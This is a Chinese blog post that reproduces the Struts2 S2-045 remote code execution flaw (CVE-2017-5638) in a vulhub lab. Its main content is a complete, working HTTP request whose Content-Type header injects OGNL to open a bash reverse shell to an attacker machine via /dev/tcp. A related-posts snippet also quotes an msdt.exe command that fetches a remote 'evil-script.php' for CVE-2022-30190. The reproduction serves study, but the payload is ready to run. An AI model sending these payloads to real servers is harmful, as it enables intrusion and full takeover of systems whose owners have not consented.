Struts2 S2-045 远程代码执行漏洞(CVE-2017-5638)

最新推荐文章于 2024-07-08 17:49:05 发布
最新推荐文章于 2024-07-08 17:49:05 发布
阅读量432 收藏 5
点赞数 10
分类专栏: RCE 安全 文章标签: struts java 后端 web安全 安全 RCE
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_68163788/article/details/139843493
版权
安全 同时被 2 个专栏收录
155 篇文章 4 订阅
订阅专栏
RCE
14 篇文章 0 订阅
订阅专栏

目录

struts2介绍

漏洞介绍

环境搭建

漏洞探测

反弹shell

这一篇还是参考大佬的好文章进行Struct2远程代码执行漏洞的学习和练习

struts2介绍

Struts2 是一个基于MVC设计模式的流行且成熟的Web应用程序框架. Struts2不仅仅是Struts 1的新版本,它完全重写了Struts架构.

Webwork框架最初以Struts框架为基础,其目标是提供一个基于Struts的增强和改进的框架,使开发人员更容易进行Web开发.过了一段时间,Webwork框架和Struts社区携手创建着名的Struts2框架.(也可以将struts2比作于一个大的servlet)。

漏洞介绍

当基于Jakarta插件上传文件时,可导致远程代码执行。例如在系统中获得管理员权限,执行添加用户。可任意查看、修改或删除文件。造成机密数据泄露,重要信息遭到篡改等重大危害。

影响版本:

Struts 2.3.5 - Struts 2.3.31

Struts 2.5 - Struts 2.5.10

环境搭建

这里的漏洞环境哈还是使用vulhub靶场

进入到如下目录中

/opt/vulhub-master/struts2/s2-045

然后使用docker-compose up -d

然后我们可以在浏览器中访问:

可以看到上述上传页面,到此环境就搭建完成了

漏洞探测

对页面进行抓包,然后增加payload:

可以看到是存在漏洞的,下面就可以进行利用了

反弹shell

在攻击机中进行监听:

反弹shell POC:

POST / HTTP/1.1
Host: 192.168.159.200:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Cookie: JSESSIONID=1x6c2fuqmvuob1gbzez3yms2fc
Upgrade-Insecure-Requests: 1
Content-Type: "%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo "bash -i >&/dev/tcp/192.168.159.151/8888 0>&1"|bash').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"
Content-Length: 0

 

成功的反弹shell

参考文章:

https://www.cnblogs.com/moyudaxia/p/14445883.html

未知百分百
关注
  • 10
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
Apache_Struts2漏洞(S2-045,CVE-2017-5638)
01-20
其中,S2-045CVE-2017-5638 是一个极其严重的问题,可能导致远程代码执行RCE),进而让攻击者完全控制受影响的服务器。 S2-045 漏洞,官方称为“基于Struts2的Content-Type注入”,是在2017年被发现的。这个...
S2-045漏洞复现
不曾扬帆,何以至远方
07-14 1826
S2-045(CVE-2017-5638)漏洞复现
Apache Struts2 S2-045远程命令执行漏洞CVE-2017-5638)复现
qq_40640917的博客
02-23 2252
Apache Struts2是Apache项目下的一个web 框架,帮助Java开发者利用J2EE来开发Web相关应用。Apache Struts2的Jakarta Multipart parser插件存在远程代码执行漏洞,攻击者可以在使用该插件上传文件时,修改HTTP请求头中的Content-Type值来触发该漏洞,导致远程执行代码
Struts2 S2-062远程代码执行漏洞(CVE-2021-31805)复现
PolarPeak的博客
06-06 1406
远程代码执行S2-062(CVE-2021-31805)由于Apache Struts2S2-061(CVE-2020-17530)的修复不够完整,导致一些标签属性仍然可以执行 OGNL 表达式,攻击者利用该漏洞可以构造恶意数据远程执行任意代码。高危。受影响的版本:Struts 2.0.0 - Struts 2.5.29安全版本:Struts >= 2.5.30漏洞环境复用vulhub/struts2/s2-061/的docker环境,使用版本是struts2.5.25链接:vulhub/struts2/
S2-046 远程代码执行漏洞CVE-2017-5638
EC_Carrot的博客
08-12 661
漏洞简介 影响版本: Struts 2.3.5 - Struts 2.3.31, Struts 2.5 - Struts 2.5.10 详细请看:https://github.com/vulhub/vulhub/blob/master/struts2/s2-046/README.zh-cn.md 漏洞复现 与s2-045类似,但是输入点在文件上传的filename值位置,并需要使用\x00截断,改了下vulhub文章的脚本: import socket q = b'''------WebKitFormBo
Struts2 s2-032远程代码执行分析1
08-08
Struts2 s2-032 远程代码执行漏洞是一个严重的安全问题,涉及到的是Apache Struts2框架的一个核心功能,即动态方法调用。这个漏洞发生在2016年4月15日,被安恒安全研究院发现,并被CVE(Common Vulnerabilities and ...
S2-045 struts2-core-2.3.32.jar 相关jar包,测试可用
03-09
目前Struts2官方已经确认漏洞漏洞编号S2-045CVE编号:cve-2017-5638),并定级为高危风险。 该漏洞的影响范围:Struts2.3.5 到 Struts2.3.31 以及 Struts2.5 到 Struts2.5.10。 修复方式:更新至Struts 2.3.32...
struts2 漏洞 "cve-2017-5638" 研究文档
11-21
目前Struts2官方已经确认漏洞漏洞编号S2-045CVE编号:cve-2017-5638),并定级为高风险。 CVE: 英文全称是“Common Vulnerabilities & Exposures”公共漏洞和暴露。CVE就好像是一个字典表,为广泛认同的信息...
struts2反序列化漏洞,存在s2-005、s2-016、s2-016_3、s2-017
08-28
最后,s2-017(CVE-2017-9791)是2017年的另一个反序列化漏洞,它影响了Struts2StrutsRequestWrapper类。攻击者可以利用这个漏洞,通过发送恶意的HTTP请求,触发系统的反序列化过程,执行任意代码。 为了应对这些...
JVM原理(十一):JVM虚拟机六种必需对类进行初始化的情况
zuodingquan666的博客
07-03 531
Java虚拟机把描述类的数据从Class文件加载到内存,并对数据进行校验、转换解析和初始化,最终形成可以被虚拟机直接使用的Java类型,这个过程被称作虚拟机的类加载机制。Java天生可以动态扩展的语言特性就是依赖运行期间动态加载和动态链接这个特点实现的。
已解决 javax.xml.transform.TransformerFactoryConfigurationError 异常的正确解决方法,亲测有效!!!
小明的Java问道之路
07-08 572
已解决 javax.xml.transform.TransformerFactoryConfigurationError 异常的正确解决方法,亲测有效!!!
如何在淘客返利系统中实现高效的搜索与推荐算法
微赚淘客开发者博客
07-08 383
本文介绍了如何在淘客返利系统中实现高效的搜索与推荐算法,涵盖了倒排索引技术、搜索结果排序优化以及协同过滤、基于内容的推荐算法的实现方法和示例。通过合理选择和优化算法,可以显著提升系统的搜索效率和推荐精度,从而增强用户体验和平台的竞争力。微赚淘客系统3.0小编出品,必属精品,转载请注明出处!
springboot中抽离日志
qq_24223159的博客
07-08 163
代码】springboot中抽离日志。
ShardingSphere
Casual_Lei的博客
07-04 655
ShardingSphere 通过提供数据分片、分布式事务、数据加密和读写分离等功能,帮助开发者轻松构建高性能、高可用的分布式数据库系统。其灵活的架构设计和丰富的功能模块,使其成为现代分布式数据库中间件的优秀选择。
maven配置使用nexus仓库
ApexPredator的博客
07-03 227
maven配置使用nexus仓库
图片压缩代码和实际操作页面
英雄汉孑的博客
07-05 921
轻盈视界,高清依旧 —— 智能图片压缩,大容量,小体积,精彩不打折
JavaSE阶段面试题(一)
tq02的博客
07-03 608
本章节主要讲述SE阶段的常见面试题
返回值处理器器【Spring源码学习】
weixin_44794897的博客
07-05 265
定义返回值类型处理器的组合;测试使用的controller测试方法。
学习mybatis
最新发布
weixin_45621552的博客
07-08 394
代码】学习mybatis。
cve-2022-30190 msdt远程代码执行漏洞复现
09-10
CVE-2022-30190是一个针对Microsoft的漏洞,被称为msdt远程代码执行漏洞。该漏洞允许攻击者通过利用命令行工具"msdt.exe"的特定参数进行远程代码执行。以下是关于该漏洞的复现过程。 首先,我们需要使用攻击者控制的远程服务器,以便在受影响的目标系统上执行恶意代码。我们创建以下PHP脚本,将其上传到我们的远程服务器上: ``` <?php system('calc.exe'); ?> ``` 这段代码将在目标系统上执行计算器应用程序,然后我们将通过"msdt.exe"命令行工具的特定参数利用该漏洞。 在受影响的目标系统上,我们将打开命令提示符,并执行以下命令: ``` msdt.exe "http://your-remote-server.com/evil-script.php" /id "netwoCpl" /showUI ``` 上述命令将启动"msdt.exe"并使用指定的URL作为参数,同时还指定了"networkCpl"作为"msdt.exe"的标识符。最后,使用"/showUI"参数显示用户界面。 当目标系统执行此命令时,"msdt.exe"会检索远程服务器上的脚本文件,并尝试执行该脚本。由于脚本文件具有恶意代码,它将在目标系统上执行计算器应用程序。 这就是CVE-2022-30190 msdt远程代码执行漏洞的一个简单复现过程。然而,值得注意的是,这只是为了说明该漏洞的原理,实际的攻击可能需要更复杂的技术和步骤。为了保护系统安全,我们建议及时更新受影响的软件,以修补此漏洞。还应该维护良好的网络安全措施,以减少被利用的风险。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

未知百分百

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值